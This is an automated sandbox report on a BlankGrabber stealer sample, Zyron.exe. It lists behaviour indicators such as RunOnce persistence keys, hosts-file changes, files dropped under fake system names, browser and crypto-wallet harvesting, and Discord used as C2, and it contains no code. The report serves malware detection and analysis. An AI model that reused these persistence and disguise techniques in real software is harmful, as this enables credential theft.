Malware Analysis Report

2024-10-16 07:05

Sample ID 240531-vtcvqsfg83
Target Zyron.exe
SHA256 a8474496d6a2d25d7e3c34cb41e22417b59ca58f7c94b514492a85bbcb969f30
Tags
blankgrabber evasion execution persistence spyware stealer upx
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

a8474496d6a2d25d7e3c34cb41e22417b59ca58f7c94b514492a85bbcb969f30

Threat Level: Known bad

The file Zyron.exe was found to be: Known bad.

Malicious Activity Summary

blankgrabber evasion execution persistence spyware stealer upx

A stealer written in Python and packaged with Pyinstaller

Blankgrabber family

Modifies visiblity of hidden/system files in Explorer

Command and Scripting Interpreter: PowerShell

Drops file in Drivers directory

Command and Scripting Interpreter: PowerShell

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

UPX packed file

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Drops file in System32 directory

Drops file in Windows directory

Enumerates physical storage devices

Unsigned PE

Enumerates system info in registry

Opens file in notepad (likely ransom note)

Suspicious use of SendNotifyMessage

Enumerates processes with tasklist

Suspicious use of SetWindowsHookEx

Gathers system information

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Runs ping.exe

Detects videocard installed

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Views/modifies file attributes

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-31 17:16

Signatures

A stealer written in Python and packaged with Pyinstaller

Description Indicator Process Target
N/A N/A N/A N/A

Blankgrabber family

blankgrabber

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-31 17:16

Reported

2024-05-31 17:20

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Zyron.exe"

Signatures

Modifies visiblity of hidden/system files in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" \??\c:\windows\resources\themes\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" \??\c:\windows\resources\svchost.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts C:\Windows\system32\attrib.exe N/A
File opened for modification C:\Windows\System32\drivers\etc\hosts \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" \??\c:\windows\resources\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" \??\c:\windows\resources\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" \??\c:\windows\resources\themes\explorer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" \??\c:\windows\resources\themes\explorer.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\explorer.exe \??\c:\windows\resources\themes\explorer.exe N/A
File opened for modification C:\Windows\SysWOW64\explorer.exe \??\c:\windows\resources\svchost.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification \??\c:\windows\resources\svchost.exe \??\c:\windows\resources\spoolsv.exe N/A
File opened for modification C:\Windows\Resources\tjud.exe \??\c:\windows\resources\themes\explorer.exe N/A
File opened for modification C:\Windows\Resources\Themes\icsys.icn.exe C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
File opened for modification C:\Windows\Resources\Themes\icsys.icn.exe C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
File opened for modification \??\c:\windows\resources\themes\explorer.exe C:\Windows\Resources\Themes\icsys.icn.exe N/A
File opened for modification C:\Windows\Resources\Themes\icsys.icn \??\c:\windows\resources\svchost.exe N/A
File opened for modification C:\Windows\Resources\Themes\icsys.icn.exe C:\Users\Admin\AppData\Local\Temp\_MEI50802\rar.exe N/A
File opened for modification \??\c:\windows\resources\spoolsv.exe \??\c:\windows\resources\themes\explorer.exe N/A
File opened for modification C:\Windows\Resources\Themes\icsys.icn.exe C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A
N/A N/A C:\Windows\system32\systeminfo.exe N/A
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\NOTEPAD.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\svchost.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\system32\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\spoolsv.exe N/A
N/A N/A \??\c:\windows\resources\spoolsv.exe N/A
N/A N/A \??\c:\windows\resources\svchost.exe N/A
N/A N/A \??\c:\windows\resources\svchost.exe N/A
N/A N/A \??\c:\windows\resources\spoolsv.exe N/A
N/A N/A \??\c:\windows\resources\spoolsv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Zyron.exe N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A \??\c:\users\admin\appdata\local\temp\zyron.exe  N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI50802\rar.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI50802\rar.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\_MEI50802\rar.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
